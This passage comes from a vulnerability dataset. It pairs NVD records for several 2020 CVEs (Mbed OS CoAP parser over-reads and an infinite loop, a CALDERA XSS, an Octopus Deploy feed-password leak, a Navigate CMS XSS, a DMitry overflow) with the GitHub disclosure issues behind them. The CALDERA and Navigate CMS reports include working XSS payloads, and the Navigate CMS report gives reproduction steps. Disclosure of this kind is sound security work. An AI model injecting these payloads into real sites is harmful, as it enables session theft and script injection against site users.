sn_coap_protocol_init(&coap_malloc, &coap_free, &coap_tx_cb, &coap_rx_cb); sn_coap_hdr_s* parsed = sn_coap_parser(coapHandle, read_bytes, message_buffer, &coapVersion); sn_coap_parser_release_allocated_coap_msg_mem(coapHandle, parsed); free(message_buffer); return 0; } ``` [sn_coap_parser.c:346__read_buffer_overflow_minimal.log](https://github.com/ARMmbed/mbed-os/files/4583597/sn_coap_parser.c.346__read_buffer_overflow_minimal.log) [sn_coap_parser.c:342__read_buffer_overflow_minimal.log](https://github.com/ARMmbed/mbed-os/files/4583598/sn_coap_parser.c.342__read_buffer_overflow_minimal.log)
Out of range memory access in MbedOS CoAP library parser - option value length
https://api.github.com/repos/ARMmbed/mbed-os/issues/12927/comments
2
2020-05-05T21:04:21Z
2020-07-02T09:28:36Z
https://github.com/ARMmbed/mbed-os/issues/12927
612,894,091
12,927
1,292
CVE-2020-12884
2020-06-18T19:15:09.973
A buffer over-read was discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse_multiple_options() parses CoAP options that may occur multiple consecutive times in a single packet. While processing the options, packet_data_pptr is accessed after being incremented by option_len without a prior out-of-bounds memory check. The temp_parsed_uri_query_ptr is validated for a correct range, but the range valid for temp_parsed_uri_query_ptr is derived from the amount of allocated heap memory, not the actual input size. Therefore the check of temp_parsed_uri_query_ptr may be insufficient for safe access to the area pointed to by packet_data_pptr. As a result, access to a memory area outside of the intended boundary of the packet buffer is made.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12928" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12928" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:arm:mbed_os:5.15.3:*:*:*:*:*:*:*", "matchCriteriaId": "B314FCEF-12B7-4510-AC5E-12D3574E3E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ARMmbed/mbed-os/issues/12928
[ "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbed-os" ]
### Description of defect **References:** https://github.com/ARMmbed/mbed-os/tree/mbed-os-5.15.3/features/frameworks/mbed-coap https://github.com/ARMmbed/mbed-coap/tree/v5.1.5 **File:** [sn_coap_parser.c](https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c) ``` Example Traces: [sn_coap_parser.c:684__read_buffer_overflow.log](https://github.com/ARMmbed/mbed-os/files/4583604/sn_coap_parser.c.684__read_buffer_overflow.log) #0 sn_coap_parser_options_parse_multiple_options() sn_coap_parser.c:684 #1 sn_coap_parser_options_parse() sn_coap_parser.c:536 #2 sn_coap_parser() sn_coap_parser.c:161 ``` **Analysis:** If a packet with malformed URI-Query option is provided as input, the parser reads out of the provided input packet memory area. https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L681-L686 The packet_data_pptr is accessed after being incremented by option_len without prior out-of-bound memory check. The temp_parsed_uri_query_ptr is validated for correct range, but the range valid for temp_parsed_uri_query_ptr is derived from the amount of allocated heap memory, not the input size. Therefore the check of temp_parsed_uri_query_ptr may be insufficient for safe access to the area pointed by packet_data_pptr. https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L635 **Type:** - Integer Overflow or Wraparound - Out-of-bounds Read **Result:** - Parsing data out of input bounds - Possible crash due out-of-bound memory access #### Target(s) affected by this defect ? - MbedOS mbed-coap library 5.1.5 - MbedOS 5.15.3 #### Toolchain(s) (name and version) displaying this defect ? N/A #### What version of Mbed-os are you using (tag or sha) ? MbedOS 5.15.3 #### What version(s) of tools are you using. List all that apply (E.g. mbed-cli) N/A #### How is this defect reproduced ? Parsing the provided input example input with sn_coap_parser() function. ```c #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include "sn_coap_protocol.h" #include "sn_coap_header.h" struct coap_s* coapHandle; coap_version_e coapVersion = COAP_VERSION_1; void* coap_malloc(uint16_t size){ return malloc(size); } void coap_free(void* addr){ free(addr); } uint8_t coap_tx_cb(uint8_t *arg_a, uint16_t arg_b, sn_nsdl_addr_s *arg_c, void *arg_d){ return 0; } int8_t coap_rx_cb(sn_coap_hdr_s *arg_a, sn_nsdl_addr_s *arg_b, void *arg_c){ return 0; } int main(int argc, const char* argv[]) { FILE *fp; size_t read_bytes; size_t input_size; uint8_t *message_buffer; if (argc != 2) { return 1; } fp = fopen(argv[1], "r"); if (fp == NULL) { return 2; } fseek (fp , 0 , SEEK_END); input_size = ftell(fp); rewind (fp); if (input_size > 65527) { return 3; } message_buffer = malloc(input_size); read_bytes = fread(message_buffer, 1, input_size, fp); fclose(fp); coapHandle = sn_coap_protocol_init(&coap_malloc, &coap_free, &coap_tx_cb, &coap_rx_cb); sn_coap_hdr_s* parsed = sn_coap_parser(coapHandle, read_bytes, message_buffer, &coapVersion); sn_coap_parser_release_allocated_coap_msg_mem(coapHandle, parsed); free(message_buffer); return 0; } ``` [sn_coap_parser.c:684__read_buffer_overflow.log](https://github.com/ARMmbed/mbed-os/files/4583611/sn_coap_parser.c.684__read_buffer_overflow.log)
Out of range memory access in MbedOS CoAP library parser - sn_coap_parser_options_parse_multiple_options
https://api.github.com/repos/ARMmbed/mbed-os/issues/12928/comments
2
2020-05-05T21:05:47Z
2020-07-02T09:34:51Z
https://github.com/ARMmbed/mbed-os/issues/12928
612,894,830
12,928
1,293
CVE-2020-12885
2020-06-18T19:15:10.050
An infinite loop was discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse_multiple_options() parses CoAP options in a while loop. This loop's exit condition is computed using the previously allocated heap memory required for storing the result of parsing multiple options. If the input heap memory calculation results in zero bytes, the loop exit condition is never met and the loop is not terminated. As a result, the packet parsing function never exits, leading to resource consumption.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12929" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12929" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:arm:mbed_os:5.15.3:*:*:*:*:*:*:*", "matchCriteriaId": "B314FCEF-12B7-4510-AC5E-12D3574E3E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/ARMmbed/mbed-os/issues/12929
[ "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbed-os" ]
### Description of defect **References:** https://github.com/ARMmbed/mbed-os/tree/mbed-os-5.15.3/features/frameworks/mbed-coap https://github.com/ARMmbed/mbed-coap/tree/v5.1.5 **File:** [sn_coap_parser.c](https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c) ``` Example Trace: #* sn_coap_parser_options_parse_multiple_options() sn_coap_parser.c:657 #* sn_coap_parser_options_parse() sn_coap_parser.c:498 #n sn_coap_parser() sn_coap_parser.c:161 ``` **Analysis:** If a packet with an option processed by parse_multiple_options() function and declared zero option length is encountered, the parser enters an infinite loop. Example entry point with zero-length option_len: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L498-L501 Together with message_left equal to 1 this results in zero-length needed heap calculation result: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L635 With zero length heap allocation the function exits early without entering the main processing loop: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L652-L657 Which leaves (*packet_data_pptr) unmodified, pointing at the same option which leads to sn_coap_parser_options_parse() looping over the same option in an infinite loop. **Type:** - Remote Denial Of Service - Excessive resources usage (CPU time) - System overload **Result:** - The procedure loops infinitely #### Target(s) affected by this defect ? - MbedOS mbed-coap library 5.1.5 - MbedOS 5.15.3 #### Toolchain(s) (name and version) displaying this defect ? N/A #### What version of Mbed-os are you using (tag or sha) ? MbedOS 5.15.3 #### What version(s) of tools are you using. List all that apply (E.g. mbed-cli) N/A #### How is this defect reproduced ? Parsing the provided input example input with sn_coap_parser() function. ```c #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include "sn_coap_protocol.h" #include "sn_coap_header.h" struct coap_s* coapHandle; coap_version_e coapVersion = COAP_VERSION_1; void* coap_malloc(uint16_t size){ return malloc(size); } void coap_free(void* addr){ free(addr); } uint8_t coap_tx_cb(uint8_t *arg_a, uint16_t arg_b, sn_nsdl_addr_s *arg_c, void *arg_d){ return 0; } int8_t coap_rx_cb(sn_coap_hdr_s *arg_a, sn_nsdl_addr_s *arg_b, void *arg_c){ return 0; } int main(int argc, const char* argv[]) { FILE *fp; size_t read_bytes; size_t input_size; uint8_t *message_buffer; if (argc != 2) { return 1; } fp = fopen(argv[1], "r"); if (fp == NULL) { return 2; } fseek (fp , 0 , SEEK_END); input_size = ftell(fp); rewind (fp); if (input_size > 65527) { return 3; } message_buffer = malloc(input_size); read_bytes = fread(message_buffer, 1, input_size, fp); fclose(fp); coapHandle = sn_coap_protocol_init(&coap_malloc, &coap_free, &coap_tx_cb, &coap_rx_cb); sn_coap_hdr_s* parsed = sn_coap_parser(coapHandle, read_bytes, message_buffer, &coapVersion); sn_coap_parser_release_allocated_coap_msg_mem(coapHandle, parsed); free(message_buffer); return 0; } ``` [hang1.log](https://github.com/ARMmbed/mbed-os/files/4583616/hang1.log) [hang_minimal.log](https://github.com/ARMmbed/mbed-os/files/4583618/hang_minimal.log)
Infinite loop in MbedOS CoAP library parser
https://api.github.com/repos/ARMmbed/mbed-os/issues/12929/comments
4
2020-05-05T21:08:59Z
2020-05-28T15:21:43Z
https://github.com/ARMmbed/mbed-os/issues/12929
612,896,526
12,929
1,294
CVE-2020-12886
2020-06-18T19:15:11.567
A buffer over-read was discovered in the CoAP library in Arm Mbed OS 5.15.3. The CoAP parser is responsible for parsing received CoAP packets. The function sn_coap_parser_options_parse() parses the CoAP packet header starting from the message token. The length of the token in the received message is provided in the first byte parsed by the sn_coap_parser_options_parse() function. The length encoded in the message is not validated against the actual input buffer length before accessing the token. As a result, memory access outside of the intended boundary of the buffer may occur.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12948" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-coap/pull/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ARMmbed/mbed-os/issues/12948" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:arm:mbed_os:5.15.3:*:*:*:*:*:*:*", "matchCriteriaId": "B314FCEF-12B7-4510-AC5E-12D3574E3E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ARMmbed/mbed-os/issues/12948
[ "Third Party Advisory" ]
github.com
[ "ARMmbed", "mbed-os" ]
### Description of defect **References:** https://github.com/ARMmbed/mbed-os/tree/mbed-os-5.15.3/features/frameworks/mbed-coap https://github.com/ARMmbed/mbed-coap/tree/v5.1.5 **File:** [sn_coap_parser.c](https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c) **Analysis:** If a packet with declared token length larger than actually provided is parsed, read out of the provided input buffer boundaries may occur. Invalid memory access may occur in sn_coap_protocol_malloc_copy() as there is no check to verify if the arguments are within input buffer boundaries: https://github.com/ARMmbed/mbed-os/blob/b6370b4c37f3d4665ed1cdcb1afea85396bba1b3/features/frameworks/mbed-coap/source/sn_coap_parser.c#L279-L288 **Type:** - Out-of-bounds Read **Result:** - Parsing data out of input bounds - Possible crash due out-of-bound memory access **Patch proposal:** https://github.com/mjurczak/mbed-coap/tree/bugfix/buffer_read_out_of_bounds #### Target(s) affected by this defect ? - MbedOS mbed-coap library 5.1.5 - MbedOS 5.15.3 #### Toolchain(s) (name and version) displaying this defect ? N/A #### What version of Mbed-os are you using (tag or sha) ? MbedOS 5.15.3 #### What version(s) of tools are you using. List all that apply (E.g. mbed-cli) N/A #### How is this defect reproduced ? Parsing the provided input example input with sn_coap_parser() function. ```c #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include "sn_coap_protocol.h" #include "sn_coap_header.h" struct coap_s* coapHandle; coap_version_e coapVersion = COAP_VERSION_1; void* coap_malloc(uint16_t size){ return malloc(size); } void coap_free(void* addr){ free(addr); } uint8_t coap_tx_cb(uint8_t *arg_a, uint16_t arg_b, sn_nsdl_addr_s *arg_c, void *arg_d){ return 0; } int8_t coap_rx_cb(sn_coap_hdr_s *arg_a, sn_nsdl_addr_s *arg_b, void *arg_c){ return 0; } int main(int argc, const char* argv[]) { FILE *fp; size_t read_bytes; size_t input_size; uint8_t *message_buffer; if (argc != 2) { return 1; } fp = fopen(argv[1], "r"); if (fp == NULL) { return 2; } fseek (fp , 0 , SEEK_END); input_size = ftell(fp); rewind (fp); if (input_size > 65527) { return 3; } message_buffer = malloc(input_size); read_bytes = fread(message_buffer, 1, input_size, fp); fclose(fp); coapHandle = sn_coap_protocol_init(&coap_malloc, &coap_free, &coap_tx_cb, &coap_rx_cb); sn_coap_hdr_s* parsed = sn_coap_parser(coapHandle, read_bytes, message_buffer, &coapVersion); sn_coap_parser_release_allocated_coap_msg_mem(coapHandle, parsed); free(message_buffer); return 0; } ``` [sn_coap_parser.c:token_overflow.log](https://github.com/ARMmbed/mbed-os/files/4600700/sn_coap_parser.c.token_overflow.log)
Out of range memory access in MbedOS CoAP library parser - token length not validated
https://api.github.com/repos/ARMmbed/mbed-os/issues/12948/comments
1
2020-05-08T18:10:34Z
2020-07-02T09:31:10Z
https://github.com/ARMmbed/mbed-os/issues/12948
614,898,715
12,948
1,295
CVE-2020-14462
2020-06-19T12:15:11.193
CALDERA 2.7.0 allows XSS via the Operation Name box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/issues/1755" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/issues/1755" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mitre:caldera:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "61EF0CDC-CB5F-416D-BC17-7DA2ACF784CB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mitre/caldera/issues/1755
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mitre", "caldera" ]
Hello, I was playing with your framework when i came across a XSS in the Operation Name box: payload: <script>alert()</script> ![image](https://user-images.githubusercontent.com/23189983/84663443-7af4d700-af1d-11ea-962c-7b1e33c35d65.png) I have no idea if you guys are interested in that type of vulnerability but i thought it would be nice to inform you anyway :) ! Have a good day, Defte
[Security] Cross Site Scripting in the operation name value
https://api.github.com/repos/mitre/caldera/issues/1755/comments
3
2020-06-15T13:33:47Z
2020-07-18T20:54:04Z
https://github.com/mitre/caldera/issues/1755
638,858,369
1,755
1,298
CVE-2020-14470
2020-06-19T16:15:10.983
In Octopus Deploy 2018.8.0 through 2019.x before 2019.12.2, an authenticated user with could trigger a deployment that leaks the Helm Chart repository password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6438" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6438" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "42BAC346-1A6F-48B0-A0C1-8D420011E67C", "versionEndExcluding": "2019.12.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2018.8.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "532" ]
532
https://github.com/OctopusDeploy/Issues/issues/6438
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
# Prerequisites - [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/2430143/Security+Disclosure+Policy). - [x] I have raised a CVE according to our [CVE process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/8290305/Requesting+a+CVE+ID) - [x] I have written a descriptive issue title - [x] I have linked the original source of this report - [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) ## Description In certain circumstances, downloading a package from the helm feed can leak the feed password to a deployment log. This means that an authenticated user could see a password that they would potentially not be authorized to view. ## Affected versions **Octopus Server:** 2018.8.0 - 2019.12.1 ## Mitigation Not a lot of good options here: * Upgrade to 2019.12.2+ * rotate feed passwords on a regular basis ## Workarounds None known. ## CVE CVE-2020-14470
Helm chart download can leak feed password
https://api.github.com/repos/OctopusDeploy/Issues/issues/6438/comments
5
2020-06-19T04:37:00Z
2020-06-24T05:23:29Z
https://github.com/OctopusDeploy/Issues/issues/6438
641,698,080
6,438
1,299
CVE-2020-14927
2020-06-19T17:15:18.303
Navigate CMS 2.9 allows XSS via the Alias or Real URL field of the "Web Sites > Create > Aliases > Add" screen.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigate_cms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "5B84FCB0-AA74-4258-B186-491AB6AC304D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/19
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**Expected behaviour** An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the **name=**"**Aliases**" feature. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Steps to reproduce** 1. Log into the Admin. 2. Go to function "Web > Web sites" 3. Go to "create > Aliases > add" 4. add "// # "><svg/onload=prompt(/NamTV/)>" in textbox Alias and Real URL. 5. Click "save". --------------result-------------- ![image](https://user-images.githubusercontent.com/35331850/85097396-96aff400-b221-11ea-8f58-b9fec58ed75b.png)
Cross Site Script Vulnerability NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/19/comments
1
2020-06-19T04:43:11Z
2020-06-19T07:52:27Z
https://github.com/NavigateCMS/Navigate-CMS/issues/19
641,699,890
19
1,300
CVE-2020-14931
2020-06-19T22:15:13.163
A stack-based buffer overflow in DMitry (Deepmagic Information Gathering Tool) 1.3a might allow remote WHOIS servers to execute arbitrary code via a long line in a response that is mishandled by nic_format_buff.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jaygreig86/dmitry/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jaygreig86/dmitry/issues/4" } ]
